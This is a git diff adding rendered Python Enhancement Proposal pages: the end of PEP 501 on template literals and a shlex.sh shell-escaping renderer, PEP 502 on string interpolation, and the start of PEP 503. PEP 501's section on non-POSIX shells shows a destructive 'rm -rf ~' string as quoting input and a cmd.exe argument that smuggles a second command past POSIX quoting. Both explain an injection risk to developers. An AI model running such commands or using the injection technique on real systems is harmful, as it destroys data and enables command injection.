Run time errors occur when evaluating the expressions inside a +template string before creating the template literal object. See PEP 498 +for some examples.

+

Different renderers may also impose additional runtime +constraints on acceptable interpolated expressions and other formatting +details, which will be reported as runtime exceptions.

+
+
+

Renderer for shell escaping added to shlex

+

As a reference implementation, a renderer for safe POSIX shell escaping can be added to +the shlex module. This renderer would be called sh and would be equivalent to +calling shlex.quote on each field value in the template literal.

+

Thus:

+
os.system(shlex.sh(t'cat {myfile}'))
+
+
+

would have the same behavior as:

+
os.system('cat ' + shlex.quote(myfile))
+
+
+

The implementation would be:

+
def sh(template: TemplateLiteral):
+    def render_field(value, format_spec, conversion_spec):
+        field_text = format(value, format_spec, conversion_spec)
+        return quote(field_text)
+    return template.render(render_field=render_field)
+
+
+

The addition of shlex.sh will NOT change the existing admonishments in the subprocess documentation that passing shell=True is best avoided, nor the reference from the os.system() documentation to the higher level subprocess APIs.

+
+
+

Changes to subprocess module

+

With the additional renderer in the shlex module, and the addition of template literals, +the subprocess module can be changed to handle accepting template literals +as an additional input type to Popen, as it already accepts a sequence, or a string, +with different behavior for each.

+

With the addition of template literals, subprocess.Popen (and in return, all its +higher level functions such as subprocess.run()) could accept strings in a safe way +(at least on POSIX systems).

+

For example:

+
subprocess.run(t'cat {myfile}', shell=True)
+
+
+

would automatically use the shlex.sh renderer provided in this PEP. Therefore, using +shlex inside a subprocess.run call like so:

+
subprocess.run(shlex.sh(t'cat {myfile}'), shell=True)
+
+
+

would be redundant, as run would automatically render any template literals through shlex.sh.

+

Alternatively, when subprocess.Popen is run without shell=True, it could still +provide subprocess with a more ergonomic syntax. For example:

+
subprocess.run(t'cat {myfile} --flag {value}')
+
+
+

would be equivalent to:

+
subprocess.run(['cat', myfile, '--flag', value])
+
+
+

or, more accurately:

+
subprocess.run(shlex.split(f'cat {shlex.quote(myfile)} --flag {shlex.quote(value)}'))
+
+
+

It would do this by first using the shlex.sh renderer, as above, then using +shlex.split on the result.

+

The implementation inside subprocess.Popen._execute_child would look like:

+
if hasattr(args, "raw_template"):
+    import shlex
+    if shell:
+        args = [shlex.sh(args)]
+    else:
+        args = shlex.split(shlex.sh(args))
+
+
+
+
+
+

How to Teach This

+

This PEP intentionally includes two standard renderers that will always be available in +teaching environments: the format() builtin and the new shlex.sh POSIX shell +renderer.

+

Together, these two renderers can be used to build an initial understanding of delayed +rendering on top of a student’s initial introduction to string formatting with f-strings. +This initial understanding would have the goal of allowing students to use template +literals effectively, in combination with pre-existing template rendering functions.

+

For example, f"{'some text'}", f"{value}", f"{value!r}", , f"{callable()}" +could all be introduced.

+

Those same operations could then be rewritten as format(t"{'some text'}"), format(t"{value}"), format(t"{value!r}"), and format(t"{callable()}") to illustrate the relationship between the eager rendering form and the delayed rendering form.

+

The difference between “template definition time” (or “interpolation time”) and “template rendering time” can then be investigated further by storing the template literals as local variables and looking at their representations separately from the results of the format calls. At this point, the t"{callable!()}" syntax can be introduced to distinguish between field expressions that are called at template definition time and those that are called at template rendering time.

+

Finally, the differences between the results of f"{'some text'}", +format(t"{'some text'}"), and shlex.sh(t"{'some text'}") could be explored to +illustrate the potential for differences between the default rendering function and custom +rendering functions.

+

Actually defining your own custom template rendering functions would then be a separate more +advanced topic (similar to the way students are routinely taught to use decorators and +context managers well before they learn how to write their own custom ones).

+

PEP 750 includes further ideas for teaching aspects of the delayed rendering topic.

+
+
+

Discussion

+

Refer to PEP 498 for previous discussion, as several of the points there +also apply to this PEP. PEP 750’s design discussions are also highly relevant, +as that PEP inspired several aspects of the current design.

+
+

Support for binary interpolation

+

As f-strings don’t handle byte strings, neither will t-strings.

+
+
+

Interoperability with str-only interfaces

+

For interoperability with interfaces that only accept strings, interpolation +templates can still be prerendered with format(), rather than delegating the +rendering to the called function.

+

This reflects the key difference from PEP 498, which always eagerly applies +the default rendering, without any way to delegate the choice of renderer to +another section of the code.

+
+
+

Preserving the raw template string

+

Earlier versions of this PEP failed to make the raw template string available +on the template literal. Retaining it makes it possible to provide a more +attractive template representation, as well as providing the ability to +precisely reconstruct the original string, including both the expression text +and the details of any eagerly rendered substitution fields in format specifiers.

+
+
+

Creating a rich object rather than a global name lookup

+

Earlier versions of this PEP used an __interpolate__ builtin, rather than +creating a new kind of object for later consumption by interpolation +functions. Creating a rich descriptive object with a useful default renderer +made it much easier to support customisation of the semantics of interpolation.

+
+
+

Building atop f-strings rather than replacing them

+

Earlier versions of this PEP attempted to serve as a complete substitute for PEP 498 (f-strings). With the acceptance of that PEP and the more recent PEP 701, this PEP can instead build a more flexible delayed rendering capability on top of the existing f-string eager rendering.

+

Assuming the presence of f-strings as a supporting capability simplified a +number of aspects of the proposal in this PEP (such as how to handle substitution +fields in format specifiers).

+
+
+

Defining repetition and concatenation semantics

+

This PEP explicitly defines repetition and concatenation semantics for TemplateLiteral +and TemplateLiteralText. While not strictly necessary, defining these is expected +to make the types easier to work with in code that historically only supported regular +strings.
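
+

A sketch of what those semantics allow (assuming the TemplateLiteral behaviour proposed in this PEP):

+
heading = "Results"
+ruler = t"=" * 10                 # repetition of the literal text
+banner = t"{heading}\n" + ruler   # concatenation preserves the field
+print(format(banner))             # renders the heading, then the ruler line
+
+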

+
+
+

New conversion specifier for lazy field evaluation

+

The initially published version of PEP 750 defaulted to lazy evaluation for all +interpolation fields. While it was subsequently updated to default to eager evaluation +(as happens for f-strings and this PEP), the discussions around the topic prompted the idea +of providing a way to indicate to rendering functions that the interpolated field value +should be called at rendering time rather than being used without modification.

+

Since PEP 750 also deferred the processing of conversion specifiers until evaluation time, +the suggestion was put forward that invoking __call__ without arguments could be seen +as similar to the existing conversion specifiers that invoke __repr__ (!a, !r) +or __str__ (!s).

+

Accordingly, this PEP was updated to also make conversion specifier processing the +responsibility of rendering functions, and to introduce !() as a new conversion +specifier for lazy evaluation.

+

Adding operator.convert_field() and updating the format() builtin was then a matter of providing appropriate support to rendering function implementations that wanted to accept the default conversion specifiers.
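
+

For example, a rendering function that wants the default behaviour could delegate to it as follows (the exact convert_field() argument convention shown is an assumption based on the description above):

+
from operator import convert_field  # proposed in this PEP; not yet in the stdlib
+
+convert_field("text", "s")   # handles !s -> str("text")
+convert_field("text", "r")   # handles !r -> repr("text")
+convert_field(list, "()")    # handles !() -> calls the value, here list() == []
+
+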

+
+
+

Allowing arbitrary conversion specifiers in custom renderers

+

Accepting !() as a new conversion specifier necessarily requires updating the syntax +that the parser accepts for conversion specifiers (they are currently restricted to +identifiers). This then raised the question of whether t-string compilation should enforce +the additional restriction that f-string compilation imposes: that the conversion specifier +be exactly one of !a, !r, or !s.

+

With t-strings already being updated to allow !() when compiled, it made sense to treat conversion specifiers as relating to the rendering function, similar to the way that format specifiers relate to the formatting of individual objects: aside from some characters that are excluded for parsing reasons, they are otherwise free text fields whose meaning is decided by the consuming function or object. This reduces the temptation to introduce renderer-specific metaformatting into the template’s format specifiers (since any renderer-specific information can be placed in the conversion specifier instead).

+
+
+

Only reserving a single new string prefix

+

The primary difference between this PEP and PEP 750 is that the latter aims to enable the use of arbitrary string prefixes, rather than requiring the creation of template literal instances that are then passed to other APIs. For example, PEP 750 would allow the sh renderer described in this PEP to be used as sh"cat {somefile}" rather than requiring the template literal to be created explicitly and then passed to a regular function call (as in sh(t"cat {somefile}")).

+

The main reason the PEP authors prefer the second spelling is that it makes it clearer to a reader what is going on: a template literal instance is being created, and then passed to a callable that knows how to do something useful with interpolation template instances.

+

A draft proposal +from one of the PEP 750 authors also suggests that static typecheckers will be able +to infer the use of particular domain specific languages just as readily from the form +that uses an explicit function call as they would be able to infer it from a directly +tagged string.

+

With the tagged string syntax at least arguably reducing clarity for human readers without +increasing the overall expressiveness of the construct, it seems reasonable to start with +the smallest viable proposal (a single new string prefix), and then revisit the potential +value of generalising to arbitrary prefixes in the future.

+

As a lesser, but still genuine, consideration, only using a single new string prefix for +this use case leaves open the possibility of defining alternate prefixes in the future that +still produce TemplateLiteral objects, but use a different syntax within the string to +define the interpolation fields (see the i18n discussion below).

+
+
+

Deferring consideration of more concise delayed evaluation syntax

+

During the discussions of delayed evaluation, {-> expr} was +suggested +as potential syntactic sugar for the already supported lambda based syntax: +{(lambda: expr)} (the parentheses are required in the existing syntax to avoid +misinterpretation of the : character as indicating the start of the format specifier).

+

While adding such a spelling would complement the rendering time function call syntax +proposed in this PEP (that is, writing {-> expr!()} to evaluate arbitrary expressions +at rendering time), it is a topic that the PEP authors consider to be better left to a +future PEP if this PEP or PEP 750 is accepted.

+
+
+

Deferring consideration of possible logging integration

+

One of the challenges with the logging module has been that we have previously +been unable to devise a reasonable migration strategy away from the use of +printf-style formatting. While the logging module does allow formatters to specify the +use of str.format() or string.Template style substitution, it can be awkward +to ensure that messages written that way are only ever processed by log record formatters +that are expecting that syntax.

+

The runtime parsing and interpolation overhead for logging messages also poses a problem +for extensive logging of runtime events for monitoring purposes.

+

While beyond the scope of this initial PEP, template literal support +could potentially be added to the logging module’s event reporting APIs, +permitting relevant details to be captured using forms like:

+
logging.debug(t"Event: {event}; Details: {data}")
+logging.critical(t"Error: {error}; Details: {data}")
+
+
+

Rather than the historical mod-formatting style:

+
logging.debug("Event: %s; Details: %s", event, data)
+logging.critical("Error: %s; Details: %s", event, data)
+
+
+

As the template literal is passed in as an ordinary argument, other +keyword arguments would also remain available:

+
logging.critical(t"Error: {error}; Details: {data}", exc_info=True)
+
+
+

The approach to standardising lazy field evaluation described in this PEP is +primarily based on the anticipated needs of this hypothetical integration into +the logging module:

+
logging.debug(t"Eager evaluation of {expensive_call()}")
+logging.debug(t"Lazy evaluation of {expensive_call!()}")
+
+logging.debug(t"Eager evaluation of {expensive_call_with_args(x, y, z)}")
+logging.debug(t"Lazy evaluation of {(lambda: expensive_call_with_args(x, y, z))!()}")
+
+
+

It’s an open question whether the definition of logging formatters would be updated to support template strings, but if they were, the most likely way of defining fields that should be looked up on the log record (rather than being interpolated eagerly) would be to escape them so they’re available as part of the literal text:

+
proc_id = get_process_id()
+formatter = logging.Formatter(t"{{asctime}}:{proc_id}:{{name}}:{{levelname}}{{message}}")
+
+
+
+
+

Deferring consideration of possible use in i18n use cases

+

The initial motivating use case for this PEP was providing a cleaner syntax +for i18n (internationalization) translation, as that requires access to the original +unmodified template. As such, it focused on compatibility with the substitution syntax +used in Python’s string.Template formatting and Mozilla’s l20n project.

+

However, subsequent discussion revealed there are significant additional +considerations to be taken into account in the i18n use case, which don’t +impact the simpler cases of handling interpolation into security sensitive +contexts (like HTML, system shells, and database queries), or producing +application debugging messages in the preferred language of the development +team (rather than the native language of end users).

+

Due to that realisation, the PEP was switched to use the str.format() substitution +syntax originally defined in PEP 3101 and subsequently used as the basis for PEP 498.

+

While it would theoretically be possible to update string.Template to support +the creation of instances from native template literals, and to implement the structural +typing.Template protocol, the PEP authors have not identified any practical benefit +in doing so.

+

However, one significant benefit of the “only one string prefix” approach used in this PEP is that while it generalises the existing f-string interpolation syntax to support delayed rendering through t-strings, it doesn’t imply that this should be the only compiler supported interpolation syntax that Python ever offers.

+

Most notably, it leaves the door open to an alternate “t$-string” syntax that would allow +TemplateLiteral instances to be created using a PEP 292 based interpolation syntax +rather than a PEP 3101 based syntax:

+
+
template = t$"Substitute $words and ${other_values} at runtime"
+

The only runtime distinction between templates created that way and templates created from +regular t-strings would be in the contents of their raw_template attributes.

+
+
+

Deferring escaped rendering support for non-POSIX shells

+

shlex.quote() works by classifying characters matching the regex character set [\w@%+=:,./-] as safe and deeming all other characters unsafe, hence requiring any string containing them to be quoted. The quoting mechanism used is then specific to the way that string quoting works in POSIX shells, so it cannot be trusted when running a shell that doesn’t follow POSIX shell string quoting rules.
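
+

To illustrate the classification:

+
>>> import shlex
+>>> shlex.quote('some_file-1.0.txt')   # only safe characters: returned unchanged
+'some_file-1.0.txt'
+>>> shlex.quote('; rm -rf ~')          # unsafe characters: single-quoted
+"'; rm -rf ~'"
+
+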

+

For example, running subprocess.run(f'echo {shlex.quote(sys.argv[1])}', shell=True) is +safe when using a shell that follows POSIX quoting rules:

+
$ cat > run_quoted.py
+import sys, shlex, subprocess
+subprocess.run(f"echo {shlex.quote(sys.argv[1])}", shell=True)
+$ python3 run_quoted.py pwd
+pwd
+$ python3 run_quoted.py '; pwd'
+; pwd
+$ python3 run_quoted.py "'pwd'"
+'pwd'
+
+
+

but remains unsafe when the shell that Python invokes is cmd.exe (or PowerShell):

+
S:\> echo import sys, shlex, subprocess > run_quoted.py
+S:\> echo subprocess.run(f"echo {shlex.quote(sys.argv[1])}", shell=True) >> run_quoted.py
+S:\> type run_quoted.py
+import sys, shlex, subprocess
+subprocess.run(f"echo {shlex.quote(sys.argv[1])}", shell=True)
+S:\> python3 run_quoted.py "echo OK"
+'echo OK'
+S:\> python3 run_quoted.py "'& echo Oh no!"
+''"'"'
+Oh no!'
+
+
+

Resolving this standard library limitation is beyond the scope of this PEP.

+
+
+
+

Acknowledgements

+
    +
  • Eric V. Smith for creating PEP 498 and demonstrating the feasibility of +arbitrary expression substitution in string interpolation
  • +
  • The authors of PEP 750 for the substantial design improvements that tagged strings +inspired for this PEP, their general advocacy for the value of language level delayed +template rendering support, and their efforts to ensure that any native interpolation +template support lays a strong foundation for future efforts in providing robust syntax +highlighting and static type checking support for domain specific languages
  • +
  • Barry Warsaw, Armin Ronacher, and Mike Miller for their contributions to +exploring the feasibility of using this model of delayed rendering in i18n +use cases (even though the ultimate conclusion was that it was a poor fit, +at least for current approaches to i18n in Python)
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0501.rst

+

Last modified: 2024-10-19 14:00:43 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0502/index.html b/pep-0502/index.html
new file mode 100644
index 00000000000..d0ff9d27f4e
--- /dev/null
+++ b/pep-0502/index.html
@@ -0,0 +1,830 @@
+
+PEP 502 – String Interpolation - Extended Discussion | peps.python.org
+
+
+


+ + +
+
+
+

PEP 502 – String Interpolation - Extended Discussion

+
+
Author:
+
Mike G. Miller
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
10-Aug-2015
+
Python-Version:
+
3.6
+
+
+
+
+
+

Abstract

+

PEP 498: Literal String Interpolation, which proposed “formatted strings”, was accepted on September 9th, 2015. Additional background and rationale given during its design phase is detailed below.

+

To recap that PEP, +a string prefix was introduced that marks the string as a template to be +rendered. +These formatted strings may contain one or more expressions +built on the existing syntax of str.format(). [10] [11] +The formatted string expands at compile-time into a conventional string format +operation, +with the given expressions from its text extracted and passed instead as +positional arguments.

+

At runtime, +the resulting expressions are evaluated to render a string to given +specifications:

+
>>> location = 'World'
+>>> f'Hello, {location} !'      # new prefix: f''
+'Hello, World !'                # interpolated result
+
+
+

Format-strings may be thought of as merely syntactic sugar to simplify traditional +calls to str.format().

+
+
+

PEP Status

+

This PEP was rejected based on its using an opinion-based tone rather than a factual one. +This PEP was also deemed not critical as PEP 498 was already written and should be the place +to house design decision details.

+
+
+

Motivation

+

Though string formatting and manipulation features are plentiful in Python, +one area where it falls short +is the lack of a convenient string interpolation syntax. +In comparison to other dynamic scripting languages +with similar use cases, +the amount of code necessary to build similar strings is substantially higher, +while at times offering lower readability due to verbosity, dense syntax, +or identifier duplication.

+

These difficulties are described at moderate length in the original +post to python-ideas +that started the snowball (that became PEP 498) rolling. [1]

+

Furthermore, replacement of the print statement with the more consistent print +function of Python 3 (PEP 3105) has added one additional minor burden, +an additional set of parentheses to type and read. +Combined with the verbosity of current string formatting solutions, +this puts an otherwise simple language at an unfortunate disadvantage to its +peers:

+
echo "Hello, user: $user, id: $id, on host: $hostname"              # bash
+say  "Hello, user: $user, id: $id, on host: $hostname";             # perl
+puts "Hello, user: #{user}, id: #{id}, on host: #{hostname}\n"      # ruby
+                                                                    # 80 ch -->|
+# Python 3, str.format with named parameters
+print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(**locals()))
+
+# Python 3, worst case
+print('Hello, user: {user}, id: {id}, on host: {hostname}'.format(user=user,
+                                                                  id=id,
+                                                                  hostname=
+                                                                    hostname))
+
+
+

In Python, the formatting and printing of a string with multiple variables in a +single line of code of standard width is noticeably harder and more verbose, +with indentation exacerbating the issue.

+

For use cases such as smaller projects, systems programming, shell script replacements, and even one-liners, where message formatting complexity has yet to be encapsulated, this verbosity has likely led a significant number of developers and administrators to choose other languages over the years.

+
+
+

Rationale

+
+

Goals

+

The design goals of format strings are as follows:

+
    +
  1. Eliminate need to pass variables manually.
  2. +
  3. Eliminate repetition of identifiers and redundant parentheses.
  4. +
  5. Reduce awkward syntax, punctuation characters, and visual noise.
  6. +
  7. Improve readability and eliminate mismatch errors, +by preferring named parameters to positional arguments.
  8. +
  9. Avoid need for locals() and globals() usage, +instead parsing the given string for named parameters, +then passing them automatically. [2] [3]
  10. +
+
+
+

Limitations

+

In contrast to other languages that take design cues from Unix and its shells, and in common with Javascript, Python specified both single (') and double (") ASCII quote characters to enclose strings. It is not reasonable to choose one of them now to enable interpolation, while leaving the other for uninterpolated strings. Other characters, such as the backtick (or grave accent `), are also constrained by history as a shortcut for repr().

+

This leaves a few remaining options for the design of such a feature:

+
    +
  • An operator, as in printf-style string formatting via %.
  • +
  • A class, such as string.Template().
  • +
  • A method or function, such as str.format().
  • +
  • New syntax, or
  • +
  • A new string prefix marker, such as the well-known r'' or u''.
  • +
+

The first three options above are mature. +Each has specific use cases and drawbacks, +yet also suffer from the verbosity and visual noise mentioned previously. +All options are discussed in the next sections.

+
+
+

Background

+

Formatted strings build on several existing techniques and proposals and what +we’ve collectively learned from them. +In keeping with the design goals of readability and error-prevention, +the following examples therefore use named, +not positional arguments.

+

Let’s assume we have the following dictionary, +and would like to print out its items as an informative string for end users:

+
>>> params = {'user': 'nobody', 'id': 9, 'hostname': 'darkstar'}
+
+
+
+

Printf-style formatting, via operator

+

This venerable technique continues to have its uses, +such as with byte-based protocols, +simplicity in simple cases, +and familiarity to many programmers:

+
>>> 'Hello, user: %(user)s, id: %(id)s, on host: %(hostname)s' % params
+'Hello, user: nobody, id: 9, on host: darkstar'
+
+
+

In this form, considering the prerequisite dictionary creation, the technique is verbose, a tad noisy, yet relatively readable. Additional issues are that an operator can only take one argument besides the original string, meaning multiple parameters must be passed in a tuple or dictionary. Also, it is relatively easy to make an error in the number of arguments passed or their expected types, to have a missing key, or to forget the trailing type character (e.g. s or d).
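
+

For instance, each of these common mistakes only surfaces at runtime:

+
>>> 'Hello, user: %(user)s, id: %(id)s' % {'user': 'nobody'}   # missing key
+Traceback (most recent call last):
+  ...
+KeyError: 'id'
+>>> 'Hello, id: %(id)' % params                                # forgotten trailing type
+Traceback (most recent call last):
+  ...
+ValueError: incomplete format
+
+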

+
+
+

string.Template Class

+

The string.Template class from PEP 292 +(Simpler String Substitutions) +is a purposely simplified design, +using familiar shell interpolation syntax, +with safe-substitution feature, +that finds its main use cases in shell and internationalization tools:

+
Template('Hello, user: $user, id: ${id}, on host: $hostname').substitute(params)
+
+
+

While also verbose, the string itself is readable. Though functionality is limited, it meets its requirements well. It isn’t powerful enough for many cases, and that helps keep inexperienced users out of trouble, as well as avoiding issues with moderately-trusted input (i18n) from third parties. It unfortunately takes enough code to discourage its use for ad-hoc string interpolation, unless encapsulated in a convenience library such as flufl.i18n.

+
+
+

PEP 215 - String Interpolation

+

PEP 215 was an earlier proposal with which this one shares a lot in common. Apparently, the world was not ready for it at the time, but considering recent support in a number of other languages, its day may have come.

+

The large number of dollar sign ($) characters it included may have +led it to resemble Python’s arch-nemesis Perl, +and likely contributed to the PEP’s lack of acceptance. +It was superseded by the following proposal.

+
+
+

str.format() Method

+

The str.format() syntax of PEP 3101 is the most recent and modern of the +existing options. +It is also more powerful and usually easier to read than the others. +It avoids many of the drawbacks and limits of the previous techniques.

+

However, due to its necessary function call and parameter passing, +it runs from verbose to very verbose in various situations with +string literals:

+
>>> 'Hello, user: {user}, id: {id}, on host: {hostname}'.format(**params)
+'Hello, user: nobody, id: 9, on host: darkstar'
+
+# when using keyword args, var name shortening sometimes needed to fit :/
+>>> 'Hello, user: {user}, id: {id}, on host: {host}'.format(user=user,
+                                                            id=id,
+                                                            host=hostname)
+'Hello, user: nobody, id: 9, on host: darkstar'
+
+
+

The verbosity of the method-based approach is illustrated here.

+
+
+

PEP 498 – Literal String Formatting

+

PEP 498 defines and discusses format strings, +as also described in the Abstract above.

+

It also, somewhat controversially to those first exposed, +introduces the idea that format-strings shall be augmented with support for +arbitrary expressions. +This is discussed further in the +Restricting Syntax section under +Rejected Ideas.

+
+
+

PEP 501 – Translation ready string interpolation

+

The complementary PEP 501 brings internationalization into the discussion as a first-class concern, with its proposal of the i-prefix, string.Template syntax integration compatible with ES6 (Javascript), deferred rendering, and an object return value.

+
+
+
+

Implementations in Other Languages

+

String interpolation is now well supported by various programming languages +used in multiple industries, +and is converging into a standard of sorts. +It is centered around str.format() style syntax in minor variations, +with the addition of arbitrary expressions to expand utility.

+

In the Motivation section it was shown how convenient interpolation syntax +existed in Bash, Perl, and Ruby. +Let’s take a look at their expression support.

+
+

Bash

+

Bash supports a number of arbitrary, even recursive constructs inside strings:

+
> echo "user: $USER, id: $((id + 6)) on host: $(echo is $(hostname))"
+user: nobody, id: 15 on host: is darkstar
+
+
+
    +
  • Explicit interpolation within double quotes.
  • +
  • Direct environment variable access supported.
  • +
  • Arbitrary expressions are supported. [4]
  • +
  • External process execution and output capture supported. [5]
  • +
  • Recursive expressions are supported.
  • +
+
+
+

Perl

+

Perl also has arbitrary expression constructs, perhaps not as well known:

+
say "I have @{[$id + 6]} guanacos.";                # lists
+say "I have ${\($id + 6)} guanacos.";               # scalars
+say "Hello { @names.join(', ') } how are you?";     # Perl 6 version
+
+
+
    +
  • Explicit interpolation within double quotes.
  • +
  • Arbitrary expressions are supported. [6] [7]
  • +
+
+
+

Ruby

+

Ruby allows arbitrary expressions in its interpolated strings:

+
puts "One plus one is two: #{1 + 1}\n"
+
+
+
    +
  • Explicit interpolation within double quotes.
  • +
  • Arbitrary expressions are supported. [8] [9]
  • +
  • Possible to change delimiter chars with %.
  • +
  • See the Reference Implementation(s) section for an implementation in Python.
  • +
+
+
+

Others

+

Let’s look at some less-similar modern languages recently implementing string +interpolation.

+
+
+

Scala

+

Scala interpolation is directed through string prefixes. +Each prefix has a different result:

+
s"Hello, $name ${1 + 1}"                    # arbitrary
+f"$name%s is $height%2.2f meters tall"      # printf-style
+raw"a\nb"                                   # raw, like r''
+
+
+

These prefixes may also be implemented by the user, +by extending Scala’s StringContext class.

+
    +
  • Explicit interpolation within double quotes with literal prefix.
  • +
  • User implemented prefixes supported.
  • +
  • Arbitrary expressions are supported.
  • +
+
+
+

ES6 (Javascript)

+

Designers of Template strings faced the same issue as Python where single +and double quotes were taken. +Unlike Python however, “backticks” were not. +Despite their issues, +they were chosen as part of the ECMAScript 2015 (ES6) standard:

+
console.log(`Fifteen is ${a + b} and\nnot ${2 * a + b}.`);
+
+
+

Custom prefixes are also supported by implementing a function the same name +as the tag:

+
function tag(strings, ...values) {
+    console.log(strings.raw[0]);    // raw string is also available
+    return "Bazinga!";
+}
+tag`Hello ${ a + b } world ${ a * b}`;
+
+
+
    +
  • Explicit interpolation within backticks.
  • +
  • User implemented prefixes supported.
  • +
  • Arbitrary expressions are supported.
  • +
+
+
+

C#, Version 6

+

C# has a useful new interpolation feature as well, +with some ability to customize interpolation via the IFormattable +interface:

+
$"{person.Name, 20} is {person.Age:D3} year{(p.Age == 1 ? "" : "s")} old.";
+
+
+
    +
  • Explicit interpolation with double quotes and $ prefix.
  • +
  • Custom interpolations are available.
  • +
  • Arbitrary expressions are supported.
  • +
+
+
+

Apple’s Swift

+

Arbitrary interpolation under Swift is available on all strings:

+
let multiplier = 3
+let message = "\(multiplier) times 2.5 is \(Double(multiplier) * 2.5)"
+// message is "3 times 2.5 is 7.5"
+
+
+
    +
  • Implicit interpolation with double quotes.
  • +
  • Arbitrary expressions are supported.
  • +
  • Cannot contain CR/LF.
  • +
+
+
+

Additional examples

+

A number of additional examples of string interpolation may be +found at Wikipedia.

+

Now that background and history have been covered, +let’s continue on for a solution.

+
+
+
+

New Syntax

+

This should be an option of last resort, +as every new syntax feature has a cost in terms of real-estate in a brain it +inhabits. +There is however one alternative left on our list of possibilities, +which follows.

+
+
+

New String Prefix

+

Given the history of string formatting in Python and backwards-compatibility, +implementations in other languages, +avoidance of new syntax unless necessary, +an acceptable design is reached through elimination +rather than unique insight. +Therefore, marking interpolated string literals with a string prefix is chosen.

+

We also choose an expression syntax that reuses and builds on the strongest of +the existing choices, +str.format() to avoid further duplication of functionality:

+
>>> location = 'World'
+>>> f'Hello, {location} !'      # new prefix: f''
+'Hello, World !'                # interpolated result
+
+
+

PEP 498 – Literal String Formatting, delves into the mechanics and +implementation of this design.

+
+
+
+

Additional Topics

+
+

Safety

+

In this section we will describe the safety situation and precautions taken +in support of format-strings.

+
    +
  1. Only string literals have been considered for format-strings, +not variables to be taken as input or passed around, +making external attacks difficult to accomplish.

    str.format() and alternatives already handle this use-case.

    +
  2. +
  3. Neither locals() nor globals() are necessary nor used during the +transformation, +avoiding leakage of information.
  4. +
  5. To eliminate complexity as well as RuntimeError (s) due to recursion +depth, recursive interpolation is not supported.
  6. +
+

However, +mistakes or malicious code could be missed inside string literals. +Though that can be said of code in general, +that these expressions are inside strings means they are a bit more likely +to be obscured.

+
+

Mitigation via Tools

+

The idea is that tools or linters such as pyflakes, pylint, or PyCharm may check inside strings with expressions and mark them up appropriately. As this is a common task with programming languages today, multi-language tools won’t have to implement this feature solely for Python, significantly shortening time to implementation.

+

Further in the future, strings might also be checked for constructs that exceed the safety policy of a project.

+
+
+
+

Style Guide/Precautions

+

As arbitrary expressions may accomplish anything a Python expression is +able to, +it is highly recommended to avoid constructs inside format-strings that could +cause side effects.

+

Further guidelines may be written once usage patterns and true problems are +known.

+
+
+

Reference Implementation(s)

+

The say module on PyPI implements string interpolation as described here +with the small burden of a callable interface:

+
> pip install say
+
+from say import say
+nums = list(range(4))
+say("Nums has {len(nums)} items: {nums}")
+
+
+

A Python implementation of Ruby interpolation is also available. +It uses the codecs module to do its work:

+
> pip install interpy
+
+# coding: interpy
+location = 'World'
+print("Hello #{location}.")
+
+
+
+
+

Backwards Compatibility

+

By using existing syntax and avoiding current or historical features, +format strings were designed so as to not interfere with existing code and are +not expected to cause any issues.

+
+
+

Postponed Ideas

+
+

Internationalization

+

Though it was highly desired to integrate internationalization support, +(see PEP 501), +the finer details diverge at almost every point, +making a common solution unlikely: [15]

+
    +
  • Use-cases differ
  • +
  • Compile vs. run-time tasks
  • +
  • Interpolation syntax needs
  • +
  • Intended audience
  • +
  • Security policy
  • +
+
+
+
+

Rejected Ideas

+
+

Restricting Syntax to str.format() Only

+

The common arguments against support of arbitrary expressions were:

+
    +
  1. YAGNI, “You aren’t gonna need it.”
  2. +
  3. The feature is not congruent with historical Python conservatism.
  4. +
  5. Postpone - can implement in a future version if need is demonstrated.
  6. +
+

Support of only str.format() syntax however, +was deemed not enough of a solution to the problem. +Often a simple length or increment of an object, for example, +is desired before printing.

+

It can be seen in the Implementations in Other Languages section that the +developer community at large tends to agree. +String interpolation with arbitrary expressions is becoming an industry +standard in modern languages due to its utility.

+
+
+

Additional/Custom String-Prefixes

+

As seen in the Implementations in Other Languages section, +many modern languages have extensible string prefixes with a common interface. +This could be a way to generalize and reduce lines of code in common +situations. +Examples are found in ES6 (Javascript), Scala, Nim, and C# +(to a lesser extent). +This was rejected by the BDFL. [14]

+
+
+

Automated Escaping of Input Variables

+

While helpful in some cases, +this was thought to create too much uncertainty of when and where string +expressions could be used safely or not. +The concept was also difficult to describe to others. [12]

+

Always consider format string variables to be unescaped, +unless the developer has explicitly escaped them.

+
+
+

Environment Access and Command Substitution

+

For systems programming and shell-script replacements, +it would be useful to handle environment variables and capture output of +commands directly in an expression string. +This was rejected as not important enough, +and looking too much like bash/perl, +which could encourage bad habits. [13]

+
+
+
+
+

Acknowledgements

+
    +
  • Eric V. Smith for the authoring and implementation of PEP 498.
  • +
  • Everyone on the python-ideas mailing list for rejecting the various crazy +ideas that came up, +helping to keep the final design in focus.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0502.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0503/index.html b/pep-0503/index.html
new file mode 100644
index 00000000000..df2c2dd9965
--- /dev/null
+++ b/pep-0503/index.html
@@ -0,0 +1,251 @@
+
+PEP 503 – Simple Repository API | peps.python.org
+
+
+


+ + +
+
+
+

PEP 503 – Simple Repository API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-Sep-2015
+
Post-History:
+
04-Sep-2015
+
Resolution:
+
Distutils-SIG message
+
+
+
+
+
+

Abstract

+

There are many implementations of a Python package repository and many tools that consume them. Of these, the canonical implementation that defines what the “simple” repository API looks like is the implementation that powers PyPI. This document will specify that API, documenting the correct behavior for any implementation of the simple repository API.

+
+
+

Specification

+

A repository that implements the simple API is defined by its base URL; this is the top level URL below which all additional URLs sit. The API is named the “simple” repository API because PyPI’s base URL is https://pypi.org/simple/.

+
+

Note

+

All subsequent URLs in this document will be relative to this base URL (so given PyPI’s URL, a URL of /foo/ would be https://pypi.org/simple/foo/).

+
+

Within a repository, the root URL (/ for this PEP, which represents the base URL) MUST be a valid HTML5 page with a single anchor element per project in the repository. The text of the anchor tag MUST be the name of the project and the href attribute MUST link to the URL for that particular project. As an example:

+
<!DOCTYPE html>
+<html>
+  <body>
+    <a href="/frob/">frob</a>
